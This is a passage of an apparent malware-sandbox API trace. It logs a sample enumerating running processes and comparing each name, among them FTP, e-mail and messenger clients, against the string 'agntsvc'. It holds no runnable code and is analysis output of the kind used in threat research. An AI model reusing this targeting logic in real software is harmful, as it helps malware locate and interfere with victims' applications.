cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0093.407] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0093.407] StrStrIA (lpFirst="coreftp.exe", lpSrch="agntsvc") returned 0x0 [0093.407] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0093.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0093.408] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x35479f8 [0093.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x35479f8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0093.408] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0093.408] StrStrIA (lpFirst="far.exe", lpSrch="agntsvc") returned 0x0 [0093.408] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0093.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.410] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3567470 [0093.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x3567470, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0093.410] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0093.410] StrStrIA (lpFirst="filezilla.exe", lpSrch="agntsvc") returned 0x0 [0093.410] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0093.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.411] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3567428 [0093.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x3567428, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0093.411] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0093.411] StrStrIA (lpFirst="flashfxp.exe", lpSrch="agntsvc") returned 0x0 [0093.411] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0093.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0093.412] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3567608 [0093.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x3567608, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0093.412] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0093.412] StrStrIA (lpFirst="fling.exe", lpSrch="agntsvc") returned 0x0 [0093.412] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0093.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0093.413] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3566ef0 [0093.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x3566ef0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0093.413] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0093.413] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="agntsvc") returned 0x0 [0093.413] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0093.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0093.414] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3566cf0 [0093.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x3566cf0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0093.414] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0093.414] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="agntsvc") returned 0x0 [0093.414] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0093.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0093.415] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3547a08 [0093.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x3547a08, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0093.415] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0093.415] StrStrIA (lpFirst="icq.exe", lpSrch="agntsvc") returned 0x0 [0093.415] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0093.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.416] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3567440 [0093.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x3567440, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0093.416] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0093.416] StrStrIA (lpFirst="leechftp.exe", lpSrch="agntsvc") returned 0x0 [0093.417] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0093.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0093.418] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3567620 [0093.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x3567620, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0093.418] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0093.418] StrStrIA (lpFirst="ncftp.exe", lpSrch="agntsvc") returned 0x0 [0093.418] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0093.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.419] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3567458 [0093.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x3567458, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0093.419] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0093.419] StrStrIA (lpFirst="notepad.exe", lpSrch="agntsvc") returned 0x0 [0093.419] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0093.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.420] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3567638 [0093.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x3567638, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0093.420] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0093.420] StrStrIA (lpFirst="operamail.exe", lpSrch="agntsvc") returned 0x0 [0093.420] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0093.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.421] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3568dd8 [0093.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x3568dd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outlook.exe", lpUsedDefaultChar=0x0) returned 12 [0093.421] lstrcpyA (in: lpString1=0x567fabc, lpString2="outlook.exe" | out: lpString1="outlook.exe") returned="outlook.exe" [0093.421] StrStrIA (lpFirst="outlook.exe", lpSrch="agntsvc") returned 0x0 [0093.421] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0093.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.423] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3568ef8 [0093.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x3568ef8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0093.423] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0093.423] StrStrIA (lpFirst="pidgin.exe", lpSrch="agntsvc") returned 0x0 [0093.423] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0093.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.424] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3568dc0 [0093.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x3568dc0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0093.424] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0093.424] StrStrIA (lpFirst="scriptftp.exe", lpSrch="agntsvc") returned 0x0 [0093.424] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0093.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0093.425] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3568df0 [0093.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x3568df0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0093.425] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0093.425] StrStrIA (lpFirst="skype.exe", lpSrch="agntsvc") returned 0x0 [0093.425] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0093.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.426] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3568f28 [0093.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x3568f28, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0093.426] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0093.426] StrStrIA (lpFirst="smartftp.exe", lpSrch="agntsvc") returned 0x0 [0093.426] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0093.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0093.427] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3568e98 [0093.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x3568e98, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thunderbird.exe", lpUsedDefaultChar=0x0) returned 16 [0093.427] lstrcpyA (in: lpString1=0x567fabc, lpString2="thunderbird.exe" | out: lpString1="thunderbird.exe") returned="thunderbird.exe" [0093.427] StrStrIA (lpFirst="thunderbird.exe", lpSrch="agntsvc") returned 0x0 [0093.427] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0093.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.428] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3568fe8 [0093.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x3568fe8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0093.428] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0093.428] StrStrIA (lpFirst="totalcmd.exe", lpSrch="agntsvc") returned 0x0 [0093.428] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0093.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.429] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3569018 [0093.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x3569018, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0093.429] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0093.429] StrStrIA (lpFirst="trillian.exe", lpSrch="agntsvc") returned 0x0 [0093.429] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0093.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.430] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3568d30 [0093.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x3568d30, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0093.431] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0093.431] StrStrIA (lpFirst="webdrive.exe", lpSrch="agntsvc") returned 0x0 [0093.431] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0093.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.432] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3568fb8 [0093.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x3568fb8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0093.432] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0093.432] StrStrIA (lpFirst="whatsapp.exe", lpSrch="agntsvc") returned 0x0 [0093.432] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0093.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.433] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3568da8 [0093.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x3568da8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0093.433] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0093.433] StrStrIA (lpFirst="winscp.exe", lpSrch="agntsvc") returned 0x0 [0093.433] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0093.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0093.434] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3566d10 [0093.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x3566d10, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 